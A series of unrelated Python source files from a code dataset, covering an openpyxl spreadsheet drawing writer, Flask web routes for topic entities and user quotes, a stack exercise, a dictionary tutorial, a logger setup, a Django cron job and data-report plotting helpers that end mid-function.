ad917964c0bed6a62931103a9b3b7267906cdf8c | 11,666 | py | Python | flask/lib/python3.6/site-packages/openpyxl/writer/drawings.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | ["MIT", "Unlicense"] | stars: 8 | issues: 3 | forks: 1
# coding=UTF-8
from __future__ import absolute_import
# Copyright (c) 2010-2014 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
from openpyxl.xml.functions import Element, SubElement, tostring
from openpyxl.xml.constants import (
DRAWING_NS,
SHEET_DRAWING_NS,
CHART_NS,
REL_NS,
CHART_DRAWING_NS,
PKG_REL_NS
)
from openpyxl.compat.strings import safe_string
class DrawingWriter(object):
""" one main drawing file per sheet """
def __init__(self, sheet):
self._sheet = sheet
def write(self):
""" write drawings for one sheet in one file """
root = Element("{%s}wsDr" % SHEET_DRAWING_NS)
for idx, chart in enumerate(self._sheet._charts):
self._write_chart(root, chart, idx+1)
for idx, img in enumerate(self._sheet._images):
self._write_image(root, img, idx+1)
return tostring(root)
def _write_chart(self, node, chart, idx):
"""Add a chart"""
drawing = chart.drawing
#anchor = SubElement(root, 'xdr:twoCellAnchor')
#(start_row, start_col), (end_row, end_col) = drawing.coordinates
## anchor coordinates
#_from = SubElement(anchor, 'xdr:from')
#x = SubElement(_from, 'xdr:col').text = str(start_col)
#x = SubElement(_from, 'xdr:colOff').text = '0'
#x = SubElement(_from, 'xdr:row').text = str(start_row)
#x = SubElement(_from, 'xdr:rowOff').text = '0'
#_to = SubElement(anchor, 'xdr:to')
#x = SubElement(_to, 'xdr:col').text = str(end_col)
#x = SubElement(_to, 'xdr:colOff').text = '0'
#x = SubElement(_to, 'xdr:row').text = str(end_row)
#x = SubElement(_to, 'xdr:rowOff').text = '0'
        # we only support absolute anchors atm (TODO: oneCellAnchor, twoCellAnchor)
x, y, w, h = drawing.get_emu_dimensions()
anchor = SubElement(node, '{%s}absoluteAnchor' % SHEET_DRAWING_NS)
SubElement(anchor, '{%s}pos' % SHEET_DRAWING_NS, {'x':str(x), 'y':str(y)})
SubElement(anchor, '{%s}ext' % SHEET_DRAWING_NS, {'cx':str(w), 'cy':str(h)})
# graph frame
frame = SubElement(anchor, '{%s}graphicFrame' % SHEET_DRAWING_NS, {'macro':''})
name = SubElement(frame, '{%s}nvGraphicFramePr' % SHEET_DRAWING_NS)
SubElement(name, '{%s}cNvPr'% SHEET_DRAWING_NS, {'id':'%s' % (idx + 1), 'name':'Chart %s' % idx})
SubElement(name, '{%s}cNvGraphicFramePr' % SHEET_DRAWING_NS)
frm = SubElement(frame, '{%s}xfrm' % SHEET_DRAWING_NS)
# no transformation
SubElement(frm, '{%s}off' % DRAWING_NS, {'x':'0', 'y':'0'})
SubElement(frm, '{%s}ext' % DRAWING_NS, {'cx':'0', 'cy':'0'})
graph = SubElement(frame, '{%s}graphic' % DRAWING_NS)
data = SubElement(graph, '{%s}graphicData' % DRAWING_NS, {'uri':CHART_NS})
SubElement(data, '{%s}chart' % CHART_NS, {'{%s}id' % REL_NS:'rId%s' % idx })
SubElement(anchor, '{%s}clientData' % SHEET_DRAWING_NS)
return node
def _write_anchor(self, node, drawing):
x, y, w, h = drawing.get_emu_dimensions()
if drawing.anchortype == "oneCell":
anchor = SubElement(node, '{%s}oneCellAnchor' % SHEET_DRAWING_NS)
xdrfrom = SubElement(anchor, '{%s}from' % SHEET_DRAWING_NS)
SubElement(xdrfrom, '{%s}col' % SHEET_DRAWING_NS).text = safe_string(drawing.anchorcol)
SubElement(xdrfrom, '{%s}colOff' % SHEET_DRAWING_NS).text = safe_string(x)
SubElement(xdrfrom, '{%s}row' % SHEET_DRAWING_NS).text = safe_string(drawing.anchorrow)
SubElement(xdrfrom, '{%s}rowOff' % SHEET_DRAWING_NS).text = safe_string(y)
else:
anchor = SubElement(node, '{%s}absoluteAnchor' % SHEET_DRAWING_NS)
SubElement(anchor, '{%s}pos' % SHEET_DRAWING_NS, {'x':safe_string(x), 'y':safe_string(y)})
SubElement(anchor, '{%s}ext' % SHEET_DRAWING_NS, {'cx':safe_string(w), 'cy':safe_string(h)})
return anchor
def _write_image(self, node, img, idx):
anchor = self._write_anchor(node, img.drawing)
pic = SubElement(anchor, '{%s}pic' % SHEET_DRAWING_NS)
name = SubElement(pic, '{%s}nvPicPr' % SHEET_DRAWING_NS)
SubElement(name, '{%s}cNvPr' % SHEET_DRAWING_NS,
{'id':'%s' % (idx + 1),
'name':'Picture %s' % idx})
cNvPicPr = SubElement(name, '{%s}cNvPicPr' % SHEET_DRAWING_NS)
paras = {"noChangeAspect": "0"}
if img.nochangeaspect:
paras["noChangeAspect"] = "1"
if img.nochangearrowheads:
paras["noChangeArrowheads"] = "1"
SubElement(cNvPicPr, '{%s}picLocks' % DRAWING_NS, paras)
blipfill = SubElement(pic, '{%s}blipFill' % SHEET_DRAWING_NS)
SubElement(blipfill, '{%s}blip' % DRAWING_NS, {
'{%s}embed' % REL_NS: 'rId%s' % idx,
'cstate':'print'
})
SubElement(blipfill, '{%s}srcRect' % DRAWING_NS)
stretch = SubElement(blipfill, '{%s}stretch' % DRAWING_NS)
SubElement(stretch, '{%s}fillRect' % DRAWING_NS)
sppr = SubElement(pic, '{%s}spPr' % SHEET_DRAWING_NS, {'bwMode':'auto'})
frm = SubElement(sppr, '{%s}xfrm' % DRAWING_NS)
# no transformation
SubElement(frm, '{%s}off' % DRAWING_NS, {'x':'0', 'y':'0'})
SubElement(frm, '{%s}ext' % DRAWING_NS, {'cx':'0', 'cy':'0'})
prstGeom = SubElement(sppr, '{%s}prstGeom' % DRAWING_NS, {'prst':'rect'})
SubElement(prstGeom, '{%s}avLst' % DRAWING_NS)
SubElement(sppr, '{%s}noFill' % DRAWING_NS)
ln = SubElement(sppr, '{%s}ln' % DRAWING_NS, {'w':'1'})
SubElement(ln, '{%s}noFill' % DRAWING_NS)
SubElement(ln, '{%s}miter' % DRAWING_NS, {'lim':'800000'})
SubElement(ln, '{%s}headEnd' % DRAWING_NS)
SubElement(ln, '{%s}tailEnd' % DRAWING_NS, {'type':'none', 'w':'med', 'len':'med'})
SubElement(sppr, '{%s}effectLst' % DRAWING_NS)
SubElement(anchor, '{%s}clientData' % SHEET_DRAWING_NS)
def write_rels(self, chart_id, image_id):
root = Element("{%s}Relationships" % PKG_REL_NS)
i = 0
for i, chart in enumerate(self._sheet._charts):
attrs = {'Id' : 'rId%s' % (i + 1),
'Type' : '%s/chart' % REL_NS,
'Target' : '../charts/chart%s.xml' % (chart_id + i) }
SubElement(root, '{%s}Relationship' % PKG_REL_NS, attrs)
for j, img in enumerate(self._sheet._images):
attrs = {'Id' : 'rId%s' % (i + j + 1),
'Type' : '%s/image' % REL_NS,
'Target' : '../media/image%s.png' % (image_id + j) }
SubElement(root, '{%s}Relationship' % PKG_REL_NS, attrs)
return tostring(root)
class ShapeWriter(object):
""" one file per shape """
def __init__(self, shapes):
self._shapes = shapes
def write(self, shape_id):
root = Element('{%s}userShapes' % CHART_NS)
for shape in self._shapes:
anchor = SubElement(root, '{%s}relSizeAnchor' % CHART_DRAWING_NS)
xstart, ystart, xend, yend = shape.coordinates
_from = SubElement(anchor, '{%s}from' % CHART_DRAWING_NS)
SubElement(_from, '{%s}x' % CHART_DRAWING_NS).text = str(xstart)
SubElement(_from, '{%s}y' % CHART_DRAWING_NS).text = str(ystart)
_to = SubElement(anchor, '{%s}to' % CHART_DRAWING_NS)
SubElement(_to, '{%s}x' % CHART_DRAWING_NS).text = str(xend)
SubElement(_to, '{%s}y' % CHART_DRAWING_NS).text = str(yend)
sp = SubElement(anchor, '{%s}sp' % CHART_DRAWING_NS, {'macro':'', 'textlink':''})
nvspr = SubElement(sp, '{%s}nvSpPr' % CHART_DRAWING_NS)
SubElement(nvspr, '{%s}cNvPr' % CHART_DRAWING_NS, {'id':str(shape_id), 'name':'shape %s' % shape_id})
SubElement(nvspr, '{%s}cNvSpPr' % CHART_DRAWING_NS)
sppr = SubElement(sp, '{%s}spPr' % CHART_DRAWING_NS)
frm = SubElement(sppr, '{%s}xfrm' % DRAWING_NS,)
# no transformation
SubElement(frm, '{%s}off' % DRAWING_NS, {'x':'0', 'y':'0'})
SubElement(frm, '{%s}ext' % DRAWING_NS, {'cx':'0', 'cy':'0'})
prstgeom = SubElement(sppr, '{%s}prstGeom' % DRAWING_NS, {'prst':str(shape.style)})
SubElement(prstgeom, '{%s}avLst' % DRAWING_NS)
fill = SubElement(sppr, '{%s}solidFill' % DRAWING_NS, )
SubElement(fill, '{%s}srgbClr' % DRAWING_NS, {'val':shape.color})
border = SubElement(sppr, '{%s}ln' % DRAWING_NS, {'w':str(shape._border_width)})
sf = SubElement(border, '{%s}solidFill' % DRAWING_NS)
SubElement(sf, '{%s}srgbClr' % DRAWING_NS, {'val':shape.border_color})
self._write_style(sp)
self._write_text(sp, shape)
shape_id += 1
return tostring(root)
def _write_text(self, node, shape):
""" write text in the shape """
tx_body = SubElement(node, '{%s}txBody' % CHART_DRAWING_NS)
SubElement(tx_body, '{%s}bodyPr' % DRAWING_NS, {'vertOverflow':'clip'})
SubElement(tx_body, '{%s}lstStyle' % DRAWING_NS)
p = SubElement(tx_body, '{%s}p' % DRAWING_NS)
if shape.text:
r = SubElement(p, '{%s}r' % DRAWING_NS)
rpr = SubElement(r, '{%s}rPr' % DRAWING_NS, {'lang':'en-US'})
fill = SubElement(rpr, '{%s}solidFill' % DRAWING_NS)
SubElement(fill, '{%s}srgbClr' % DRAWING_NS, {'val':shape.text_color})
SubElement(r, '{%s}t' % DRAWING_NS).text = shape.text
else:
SubElement(p, '{%s}endParaRPr' % DRAWING_NS, {'lang':'en-US'})
def _write_style(self, node):
""" write style theme """
style = SubElement(node, '{%s}style' % CHART_DRAWING_NS)
ln_ref = SubElement(style, '{%s}lnRef' % DRAWING_NS, {'idx':'2'})
scheme_clr = SubElement(ln_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'accent1'})
SubElement(scheme_clr, '{%s}shade' % DRAWING_NS, {'val':'50000'})
fill_ref = SubElement(style, '{%s}fillRef' % DRAWING_NS, {'idx':'1'})
SubElement(fill_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'accent1'})
effect_ref = SubElement(style, '{%s}effectRef' % DRAWING_NS, {'idx':'0'})
SubElement(effect_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'accent1'})
font_ref = SubElement(style, '{%s}fontRef' % DRAWING_NS, {'idx':'minor'})
SubElement(font_ref, '{%s}schemeClr' % DRAWING_NS, {'val':'lt1'})
ad95ad8e3ed853f12dee35a35c4756b3a861699f | 2,244 | py | Python | server/views/topics/entities.py | rleir/MediaCloud-Web-Tools | 86fd42959bec2f24c74cf63277da1931a159b218 | ["Apache-2.0"]
import logging
from flask import jsonify
import flask_login
from server import app
from server.auth import user_mediacloud_key
from server.util.tags import CLIFF_PEOPLE, CLIFF_ORGS, processed_for_entities_tag_ids
from server.util.request import api_error_handler
from server.views.topics.apicache import topic_tag_coverage, topic_tag_counts
import server.util.csv as csv
logger = logging.getLogger(__name__)
DEFAULT_DISPLAY_AMOUNT = 50
ENTITY_DOWNLOAD_COLUMNS = ['tags_id', 'label', 'count', 'pct']
def process_tags_for_coverage(topics_id, tag_counts):
coverage = topic_tag_coverage(topics_id, processed_for_entities_tag_ids())
top_tag_counts = tag_counts[:DEFAULT_DISPLAY_AMOUNT]
for t in tag_counts: # add in pct to ALL counts, not top, so CSV download can include them
try:
t['pct'] = float(t['count']) / float(coverage['counts']['count'])
except ZeroDivisionError:
t['pct'] = 0
data = {
'entities': top_tag_counts,
'coverage': coverage['counts'],
}
return data
@app.route('/api/topics/<topics_id>/entities/people', methods=['GET'])
@flask_login.login_required
@api_error_handler
def topic_top_people(topics_id):
top_tag_counts = topic_tag_counts(user_mediacloud_key(), topics_id, CLIFF_PEOPLE)
data = process_tags_for_coverage(topics_id, top_tag_counts)
return jsonify(data)
@app.route('/api/topics/<topics_id>/entities/organizations', methods=['GET'])
@flask_login.login_required
@api_error_handler
def topic_top_orgs(topics_id):
top_tag_counts = topic_tag_counts(user_mediacloud_key(), topics_id, CLIFF_ORGS)
data = process_tags_for_coverage(topics_id, top_tag_counts)
return jsonify(data)
@app.route('/api/topics/<topics_id>/entities/<type_entity>/entities.csv', methods=['GET'])
@flask_login.login_required
def entities_csv(topics_id, type_entity):
tag_type = CLIFF_PEOPLE if type_entity == 'people' else CLIFF_ORGS
top_tag_counts = topic_tag_counts(user_mediacloud_key(), topics_id, tag_type)
data = process_tags_for_coverage(topics_id, top_tag_counts)
return csv.stream_response(data['entities'], ENTITY_DOWNLOAD_COLUMNS,
                               'topic-{}-entities-{}'.format(topics_id, type_entity))  # "type_entity"; the original passed the builtin "type"
ad9609b2b9a236c2ab46994ebdb441f11cd465b2 | 1,380 | py | Python | code06-03.py | rcm2000/learn_algorithm | 0134176df8e5f5f46c67642212de8def58f4bef9 | ["Apache-2.0"]
## Functions
def isStackFull():  # renamed from the misspelled "isStckFull"
    global SIZE, stack, top
    if top == SIZE - 1:
        return True
    else:
        return False

def push(data):
    global SIZE, stack, top
    if isStackFull():
        print('The stack is full.')
return
top +=1
stack[top] = data
def isStackEmpty():
global SIZE, stack, top
if top <= - 1:
return True
else:
return False
def pop():
global SIZE, stack, top
if isStackEmpty():
        print('The stack is empty.')
return
data = stack[top]
stack[top] = None
top -= 1
return data
def peek():
global SIZE, stack, top
if isStackEmpty():
        print('The stack is empty.')
return None
return stack[top]
## Global variables
SIZE = 5
stack = [None for _ in range(SIZE)]
top = -1
select = -1
## Main
if __name__ =="__main__":
while(select != 4):
select = int(input("선택하세요(1:삽입,2:추출,3:확인,4.종료)-->"))
if(select == 1):
            data = input('Data to push ----->')
push(data)
            print('Current stack state', stack)
elif (select == 2):
data = pop()
            print('Popped data =', data)
            print('Current stack state', stack)
elif (select == 3):
data = peek()
            print('Peeked data =', data)
elif (select == 4):
            print('Current stack state', stack)
            break  # the original bare "exit" here was a no-op expression
else:
print("1~4의 숫자만 이용가능합니다")
            continue
ad970dc4124339b7ef7f16d80790d68e5bfa52b7 | 892 | py | Python | astr-119-hw-2/dictionaries.py | talirrito/astr-119 | 22682b798b7a200fa8227539b42f2630f7f989b0 | ["MIT"] | issues: 7
#define a dictionary data structure
#dictionaries are lists but with key value associations
#dictionaries have a key : value for the elements, like looking up a word in the dictionary
#in astronomy, catalogues are often represented as dictionaries; arrays would be clumsy for this kind of lookup
example_dict = {
"class" : "Astr 119",
"prof" : "Brant",
"awesomeness" : 10 #note that the last element does NOT have a comma
}
print(type(example_dict)) #will print <class 'dict'>
#get a value via a key
course = example_dict["class"] #this will replace class" with "course
print(course)
#change a value via a key
example_dict["awesomeness"] += 1 #increase awesomeness
#print dictionary
print(example_dict)
#print dictionary element by element
for x in example_dict.keys(): #x takes each key in turn; print the key, then the value associated with it
    print(x, example_dict[x])
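#an equivalent loop, added for illustration: .items() yields (key, value)
#pairs directly, so the second lookup above is not needed
for key, value in example_dict.items():
    print(key, value)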
ad97cf54b23c3db9dc2e1530a9879f0edaf8a9be | 797 | py | Python | src/logger.py | gerritjandebruin/cargo-ship-noncompliance-assessment | 3781548920069351f4feb6aeac3c61d3839642d4 | ["MIT"]
import logging
from rich.logging import RichHandler
logger = logging.getLogger(__name__)
# the handler determines where the logs go: stdout/file
shell_handler = RichHandler()
# file_handler = logging.FileHandler("debug.log")
logger.setLevel(logging.INFO)
shell_handler.setLevel(logging.DEBUG)
# file_handler.setLevel(logging.DEBUG)
# the formatter determines what our logs will look like
fmt_shell = '%(message)s'
# fmt_file = '%(levelname)s %(asctime)s [%(filename)s:%(funcName)s:%(lineno)d] %(message)s'
shell_formatter = logging.Formatter(fmt_shell)
# file_formatter = logging.Formatter(fmt_file)
# here we hook everything together
shell_handler.setFormatter(shell_formatter)
# file_handler.setFormatter(file_formatter)
logger.addHandler(shell_handler)
# logger.addHandler(file_handler)
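# Minimal usage example (illustrative): because the logger level is INFO while
# the shell handler allows DEBUG, only INFO and above reach the Rich output.
# logger.info("processing started")   # shown
# logger.debug("verbose details")     # filtered out by the logger's INFO level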
ad990bc8eb53333ac7514239109a77427ece7ae4 | 912 | py | Python | transformer/cron.py | ulsdevteam/pisces | c3c6a513e8c29bf95673971b158828e1cc85c744 | ["MIT"] | stars: 1 | issues: 307 | forks repo: RockefellerArchiveCenter/pisces @ 0fcdfd7a6055e6df58cc27058e31249cfe3ecca7
from datetime import datetime
from django_cron import CronJobBase, Schedule
from .mappings import has_online_asset
from .models import DataObject
class CheckMissingOnlineAssets(CronJobBase):
code = "transformer.online_assets"
RUN_EVERY_MINS = 0
schedule = Schedule(run_every_mins=RUN_EVERY_MINS)
def do(self):
print("Checking for recently added assets at {}".format(datetime.now()))
for object in DataObject.objects.filter(object_type__in=["collection", "object"], online_pending=True).iterator():
if has_online_asset(object.es_id):
object.data["online"] = True
object.online_pending = False
object.indexed = False
object.save()
print("Online assets discovered for {}".format(object.es_id))
print("Finished checking for recently added assets at {}\n".format(datetime.now()))
| 38 | 122 | 0.678728 | 108 | 912 | 5.555556 | 0.481481 | 0.04 | 0.06 | 0.08 | 0.106667 | 0.106667 | 0 | 0 | 0 | 0 | 0 | 0.001414 | 0.224781 | 912 | 23 | 123 | 39.652174 | 0.847242 | 0 | 0 | 0 | 0 | 0 | 0.185307 | 0.027412 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.222222 | 0 | 0.5 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad998c571e279c84a76646b4865a1eab29a24efc | 1,911 | py | Python | src/blueprints/server_routes.py | oppsec/flaskquotes | 49b6eec3fd996e649bdfa410f11532bd1c00ee70 | ["MIT"]
from flask import Blueprint
from flask import redirect
from flask import abort
from flask_login import current_user
from flask_login import logout_user
from utils.decorators import login_required
from utils.session import find_user
server_routes = Blueprint(name="server_routes",
import_name=__name__,
template_folder="templates")
@server_routes.route("/delete/<int:quote_id>")
@login_required
def remove_quote(quote_id: int):
"""Removes the given ID quote from the database.
Notes
-----
- If the user is anonymous, he is redirected to /login;
- If the user is not the owner of the quote, a 401 status is raised;
- If the quote does not exist, a 404 status code is raised.
"""
    quote = current_user._quotes.filter_by(id=quote_id).first()
    # If the quote doesn't exist, return 404 (this branch was unreachable in
    # the original, which aborted with 401 for missing quotes)
    if quote is None:
        abort(404)
    if quote not in current_user._quotes:
        abort(401)
    current_user.remove_quote(quote)
    return redirect(f"/user/{current_user.usertag}")
@server_routes.route("/follow/<string:usertag>")
@login_required
def follow(usertag: str):
"""Follow the user given at endpoint and redirect to his profile.
Notes
-----
- If the user is anonymous, he is redirected to /login;
- If the user does not exist, a 404 status code is raised.
"""
user = find_user(usertag)
if user is None:
abort(404)
current_user.follow(user)
return redirect(f"/user/{usertag}")
@server_routes.route("/unfollow/<string:usertag>")
@login_required
def unfollow(usertag: str):
user = find_user(usertag)
if user is None:
abort(404)
current_user.unfollow(user)
return redirect(f"/user/{usertag}")
@server_routes.route("/logout")
@login_required
def logout():
"""Ends a flask_login user session."""
logout_user()
return redirect('/')
ad99c74c699cc24e8fcbe1b0d05f9178ebff68bd | 16,043 | py | Python | tool/auxiliary_fuction.py | Anfany/Machine-Learning-Competition-by-Python3 | 2900fa40544fa36b135e824a43a8c31de9c73d92 | ["MIT"] | stars: 1
# -*- coding:utf-8 -*-
# &Author AnFany
# Helper functions needed by the data overview: plotting functions and data-generating functions
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt  # plotting
from pylab import mpl  # CJK (Chinese) font display settings
from collections import Counter
import seaborn as sns
import matplotlib.gridspec as gridspec
import data_report_config as drc
mpl.rcParams['axes.unicode_minus'] = False  # render minus signs correctly
plt.rcParams['font.family'] = ['Arial Unicode MS']
# Function that processes label data so that long adjacent labels do not
# overlap and spoil the display
def handle_str(x_data, length=8):
    """
    Insert a line break every `length` characters
    :param x_data: label data, list
    :param length: break interval
    :return: list of processed labels
    """
new_data = []
for i in x_data:
i = str(i)
new_data.append(re.sub(r"(.{%d})" % length, "\\1-\n", i))
return new_data
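# Illustrative example (added): handle_str(['categoryAB'], length=8) returns
# ['category-\nAB'], i.e. a hyphen plus newline after every 8 characters.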
# Produce the data needed to draw a bar chart
def generate_bar(data):
    """
    Produce the data needed to draw a bar chart
    :param data: categorical feature data
    :return: label values and their corresponding counts (sorted by count, descending)
    """
data_dict = Counter(data)
sort_dict = sorted(data_dict.items(), key=lambda x: x[1], reverse=True)
x_data, y_data = [], []
for j in sort_dict:
x_data.append(j[0])
y_data.append(j[1])
return x_data, y_data
# Bar chart plotting function: matplotlib
def plot_bar(x_data, y_data, title, fig_name):
    """
    Draw a bar chart
    :param x_data: label data, list
    :param y_data: counts corresponding to the labels, list
    :param title: figure title, string
    :param fig_name: figure file name, string
    :return:
    """
    # plot
plt.style.use('ggplot')
fig, ax = plt.subplots(figsize=(9, 6))
    # handle long labels
    x_data = handle_str(x_data)
    # draw the vertical bars
    ax.bar(x_data, y_data, width=.3)
    # remove the surrounding frame (spine.set_visible(False))
    [spine.set_visible(False) for spine in ax.spines.values()]
    # remove the useless tick marks between the x and y axes
    ax.tick_params(top=False, left=False, right=False)
    plt.yticks([])  # remove the y-axis tick labels
    # show the actual values on the bars
vmax = max(y_data)
for i, value in zip(x_data, y_data):
ax.text(i, value + vmax * 0.02, '%d' % value, va='center', fontsize=12)
plt.title(title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# Histogram plotting function: seaborn
def plot_hist(x_data, title, fig_name):
    """
    Draw a histogram
    :param x_data: data list
    :param title: figure title, string
    :param fig_name: figure file name, string
    :return: histogram
    """
    plt.style.use('ggplot')
    plt.figure(figsize=(9, 6), dpi=100)  # the dpi parameter sets the image resolution
sns.distplot(x_data, hist=True, kde=True)
plt.title(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# Produce the data needed to draw a grouped (per-class) bar chart
def generate_bar_type(x_data, y_data):
    """
    Produce the data needed to draw a grouped bar chart
    :param x_data: class data, list
    :param y_data: label data, list
    :return: set of classes; set of labels (sorted by count); dict of {class: {label: count}}
    """
    # first fix the order of the label set
la_dict = Counter(y_data)
sort_dict = sorted(la_dict.items(), key=lambda x: x[1], reverse=True)
new_y = [j[0] for j in sort_dict]
    # get the set of classes
type_list = sorted(list(set(x_data)), reverse=True)
    # build the dict
data_dict = {h: Counter([j for i, j in zip(x_data, y_data) if i == h]) for h in type_list}
return type_list, new_y, data_dict
# Function that draws a stacked bar chart with an attached data table
def plot_hist_with_type(x_data, y_data, data_dict, title, fig_name):
    """
    Draw a stacked bar chart
    :param x_data: set of classes, list of strings
    :param y_data: set of labels, list
    :param data_dict: dict of the form {class: {label: count}}
    :param title: figure title, string
    :param fig_name: figure file name, string
    :return:
    """
fig = plt.figure()
gs = gridspec.GridSpec(3, 1)
ax0 = fig.add_subplot(gs[:2, :])
ax1 = fig.add_subplot(gs[2, 0])
fig.subplots_adjust(hspace=0.8)
sign = 1
    # the elements of y_data must be converted to strings
    str_y_data = handle_str(y_data)
    cc = []  # running bottom offsets for the stacked bars
table_data = []
for index, t in enumerate(x_data):
plot_data = [data_dict[t][h] if h in data_dict[t] else 0 for h in y_data]
table_data.append([str(j) for j in plot_data])
if sign:
            ax0.bar(str_y_data, plot_data, label='class: %s' % t, width=0.3)
cc = np.array(plot_data)
sign = 0
else:
            ax0.bar(str_y_data, plot_data, label='class: %s' % t, bottom=cc, width=0.3)
cc += np.array(plot_data)
ax0.legend()
ax0.set_title(u'%s' % title)
x_data.reverse()
table_data.reverse()
    # add the data table
    # compute the class proportions
    title_type = [[h, sum(data_dict[h].values())] for h in x_data]
    # class names
    str_type = 'class %s' % title_type[0][0]
    # ratio string
    str_pre = '1'
num = title_type[0][1]
for jj in title_type[1:]:
        str_type += ' : class %s' % jj[0]
str_pre += ':%.3f' % (jj[1] / num)
[spine.set_visible(False) for spine in ax1.spines.values()]
ax1.set_xticks([])
ax1.set_yticks([])
ax1 = plt.gca()
ax1.patch.set_facecolor("white")
    # append the class ratios as the last row of the table
    x_data += ['ratio']
str_p = []
for i in range(len(table_data[0])):
num = float(table_data[0][i])
str_per = '1:'
for j in range(1, len(table_data)):
if num != 0:
str_per += '%.3f' % (float(table_data[j][i]) / num)
else:
str_per += '0'
str_p.append(str_per)
table_data.append(str_p)
    ax1.set_xlabel(u'Samples: ' + str_type + ', ratio ' + str_pre)
ax1.table(cellText=table_data, rowLabels=x_data, loc='center', cellLoc='center')
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# Generate the data for per-class probability densities
def generate_data_for_plot_distribution(x_data, y_data):
    """
    Output a dict mapping each class to its list of values
    :param x_data: list of class values
    :param y_data: list of numeric values
    :return: dict of {class: [value list]}
    """
digit_data_dict = {}
for key, value in zip(x_data, y_data):
if key in digit_data_dict:
digit_data_dict[key].append(value)
else:
digit_data_dict[key] = [value]
return digit_data_dict
# Draw class-labelled probability density curves
def plot_density_with_type(data_dict, title, fig_name, xlabel):
    """
    Draw probability density curves, one per class
    :param data_dict: dict mapping each class to its list of values
    :param title: figure title
    :param fig_name: figure file name
    :param xlabel: x-axis title
    :return:
    """
plt.figure()
for j, t in enumerate(sorted(list(data_dict.keys()))):
        sns.distplot(list(data_dict[t]), hist=True, label='class: %s' % str(t))
plt.title(u'%s' % title)
plt.legend()
plt.xlabel(u'%s' % xlabel)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
# Compute the Pearson correlation coefficient between two sequences
def get_pearson(data1, data2):
    """
    Compute the Pearson coefficient between the two data series
    :param data1: data 1, list
    :param data2: data 2, list
    """
    x1, x2 = np.array(data1), np.array(data2)
    # center the series first; without this step the original code computed
    # cosine similarity rather than the Pearson coefficient
    x1 = x1 - np.mean(x1)
    x2 = x2 - np.mean(x2)
    # sum of products
    xy = np.sum(x1 * x2)
    # sums of squares
    sx1 = np.sum(x1 ** 2)
    sx2 = np.sum(x2 ** 2)
    return xy / ((sx1 ** 0.5) * (sx2 ** 0.5))
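# Quick check (illustrative): for non-constant series the value should agree
# with numpy's built-in correlation, e.g. np.corrcoef(data1, data2)[0, 1].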
# Scatter plot
def plot_scatter(data1, data2, title, fig_name, labelx, labely):
    """
    Draw a scatter plot of the two data series
    :param data1: data 1, list
    :param data2: data 2, list
    :param title: figure title
    :param fig_name: figure file name
    :param labelx: x-axis title
    :param labely: y-axis title
    :return: scatter plot
    """
plt.style.use('ggplot')
plt.figure()
plt.plot(data1, data2, 'o')
    plt.title(u'%s, Pearson coefficient: %.4f' % (title, get_pearson(data1, data2)))
plt.xlabel(u'%s' % labelx)
plt.ylabel(u'%s' % labely)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_two_type_type_pie(data1, data2, data3, title, fig_name):
"""
data1,data2均是类别型特征的值的列表。 data3是类别型特征。绘制组合特征值组合的分类饼图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:return: 饼图
"""
# 2个类别特征的值
type_data1 = sorted(list(set(data1)))
type_data2 = sorted(list(set(data2)))
# 目标特征的值
t_type = sorted(list(set(data3)))
# 特征值数少的作为行
if len(type_data1) > len(type_data2):
type_data1, type_data2 = type_data2, type_data1
data1, data2 = data2, data1
    # set up the figure grid
    fig, axes = plt.subplots(nrows=len(type_data1), ncols=len(type_data2))
    # size each pie according to how many samples fall into it
min_num, max_num = 0.9, 1.9
size_dict = {}
count_dict = {}
for a in type_data1:
for b in type_data2:
pie_data = []
for c, d, e in zip(data1, data2, data3):
if a == c and b == d:
pie_data.append(e)
size_dict['%s_%s' % (str(a), str(b))] = len(pie_data) / len(data3)
count_dict['%s_%s' % (str(a), str(b))] = pie_data
    # rescale the pie sizes into [min_num, max_num]; the original expression
    # was missing parentheses around (size_dict[h] - min), so operator
    # precedence produced the wrong value
    trans_size_dict = {h: ((size_dict[h] - min(size_dict.values()))
                           / (max(size_dict.values()) - min(size_dict.values()))
                           * (max_num - min_num) + min_num) for h in size_dict}
    # position of each subplot
sign = 0
for a in type_data1:
for b in type_data2:
            # tally the target values in this cell
new_dict = {}
for k in count_dict['%s_%s' % (str(a), str(b))]:
if k in new_dict:
new_dict[k] += 1
else:
new_dict[k] = 1
            # counts per target value
